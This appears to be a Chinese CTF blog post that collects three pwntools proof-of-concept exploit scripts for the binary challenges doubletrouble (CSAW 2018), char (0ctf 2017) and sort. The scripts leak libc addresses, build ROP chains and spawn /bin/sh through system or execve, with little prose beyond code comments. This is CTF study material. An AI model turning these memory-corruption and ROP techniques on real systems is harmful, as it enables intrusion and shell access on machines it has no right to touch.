令人绝望的 Pwn Poc 总结
2018 CSAW - doubletrouble
题目链接:doubletrouble.zip
from pwn import *
local=1
elf=ELF('./doubletrouble')
if local:
io=process('./doubletrouble')
else:
io=remote('pwn.chal.csaw.io', 9002)
def d2b(f):
return struct.pack('<d', f)
def b2d(f):
return struct.unpack('<d', f)[0]
def sendNum(num):
print 'sendNum: %.20e' % num
io.sendlineafter('Give me: ','%.20e' % num)
def sendNumPair(num1,num2):
sendNum(b2d(p32(num1)+p32(num2)))
def pwn1(): # leak got addr
io.sendlineafter('How long: ','64')
for i in range(7): sendNum(-100)
sendNum(-99) # junk_canary
sendNum(-98) # junk
sendNumPair(0xF7FFFFFF, 0x0804977C) # fake ebp ; eip: [pop esi ; pop ebp ; ret]
sendNum(-98) # junk
sendNumPair(elf.plt['puts'], 0x080498A2) # plt.puts ; ret: [pop edi ; pop ebp ; ret]
sendNumPair(elf.got['puts'], 0x080498A8) # got.puts ; junk
sendNumPair(elf.symbols['_start'], 0x080498AC) # program run again ; junk
for i in range(64-7-7): sendNum(-98)
def pwn2(): # call system & get shell
io.recvuntil('70:')
io.recvline() # junk
data=io.recv(4) # get got addr
if '***' in data:
print 'stack smashing detected, try again!'
exit()
libc_puts_addr=u32(data)
if local:
libc_base_addr=libc_puts_addr-0x67e30
libc_system_addr=libc_base_addr+0x3d7e0
libc_sh_addr=libc_base_addr+0x17c968
else:
libc_base_addr=libc_puts_addr-0x67b40
libc_system_addr=libc_base_addr+0x3d200
libc_sh_addr=libc_base_addr+0x17e0cf
print 'libc_puts_addr: %s' % hex(libc_puts_addr)
print 'libc_base_addr: %s' % hex(libc_base_addr)
print 'libc_system_addr: %s' % hex(libc_system_addr)
print 'libc_sh_addr: %s' % hex(libc_sh_addr)
if not local:
io.recvline() # junk
stack_addr=int(io.recvline().strip(),16)
print 'stack_addr: %s' % hex(stack_addr)
io.sendlineafter('How long: ','64')
if local:
for i in range(6): sendNum(-100)
sendNum(-99) # junk_canary
sendNum(-98) # junk
sendNumPair(0xF7FFFFFF, 0x0804977C) # fake ebp ; eip: [pop esi ; pop ebp ; ret]
sendNum(-98) # junk
sendNumPair(libc_system_addr, 0x080498A2) # got.system ; fake_ret
sendNumPair(libc_sh_addr, 0x080498A8) # got.str_sh ; junk
for i in range(64-6-6): sendNum(-98)
else:
for i in range(8): sendNum(-100)
sendNum(-99) # junk_canary
sendNum(-98) # junk
sendNumPair(0xF7FFFFFF, 0x0804977C) # fake ebp ; eip: [pop esi ; pop ebp ; ret]
sendNum(-98) # junk
sendNumPair(libc_system_addr, 0x080498A2) # got.system ; fake_ret
sendNumPair(stack_addr+0x230, 0x080498A8) # stack.str_command ; junk
#sendNumPair(0x2F20736C, 0x6E69622F) # ls //bin
#sendNumPair(0x00000000, 0x6E696230) # \x00 ; junk
sendNumPair(0x6E69622F, 0x6162722F) # /bin/rba
sendNumPair(0x00006873, 0x61627230) # sh\x00 ; junk
for i in range(64-8-8): sendNum(-98)
pwn1()
pwn2()
io.interactive()
2017 0ctf - char
题目链接:char.zip
from pwn import *
io=process('./char')
libc_base=0x5555e000
payload='a'*0x1c+'a'*0x4
payload+=p32(libc_base+0x000a8456) # xchg ebx, ecx ; test edx, edx ; je 0xa8467 ; mov dword ptr [edx], eax ; ret
payload+=p32(libc_base+0x00094b49) # pop ebx ; pop esi ; ret 0x556bb7ec
# str_sh_addr=ebx+esi
payload+=p32(0x2a355b76) # ebx
payload+=p32(0x2b365c76) # esi
payload+=p32(libc_base+0x00187554) # add ebx, esi ; add dword ptr [edx], ecx ; ret
payload+=p32(libc_base+0x000b9940) # mov edx, 0xffffffff ; cmovne eax, edx ; ret
payload+=p32(libc_base+0x000e4d7a) # inc edx ; xor eax, eax ; ret
payload+=p32(libc_base+0x000e6263)*11 # inc eax ; ret
payload+=p32(libc_base+0x00109177) # int 0x80
print payload
io.sendafter('GO : ) \n',payload)
io.interactive()
sort
题目链接:sort.zip
from pwn import *
context.log_level='debug'
io=process('./sort')
def send_num(num):
io.sendline(str(num))
io.sendlineafter('be sorted: \n','32')
io.recvuntil('no. : \n')
for i in range(0x4):
send_num(0xfffffffe) # junk code
send_num(0xffffffff) # fake ebp
send_num(0x0804887c) # eip: getinp
send_num(0x080eba24) # fake ret addr
send_num(0x080eba28) # getinp param1: read addr
send_num(0x080eba2C) # getinp param2: read len
for i in range(0x20-10):
send_num(0x080eba30) # junk code
send_num(0x080eba34) # eip
payload=p32(0x00000000) # \x00\x00\x00\x00
payload+=p32(0x6e69622f) # nib/
payload+=p32(0x0068732f) # \x00hs/
payload+=p32(0xfffffffe)*2 # junk code
payload+=p32(0x08052b14) # pop eax ; ret
payload+=p32(0x080eba28) # getinp param1: read addr ; bypass 0x080488B3
payload+=p32(0x08052b14) # pop eax ; ret
payload+=p32(0x0000000b) # eax: 0x0b
payload+=p32(0x080481c9) # pop ebx ; ret
payload+=p32(0x080eba2c) # ebx addr: /bin/sh\x00
payload+=p32(0x080dedf5) # pop ecx ; ret
payload+=p32(0x080eba28) # ecx addr: \x00\x00\x00\x00
payload+=p32(0x0806fdda) # pop edx ; ret
payload+=p32(0x080eba28) # edx addr: \x00\x00\x00\x00
payload+=p32(0x0806da43) # int 0x80
io.send(payload)
io.interactive()
Comments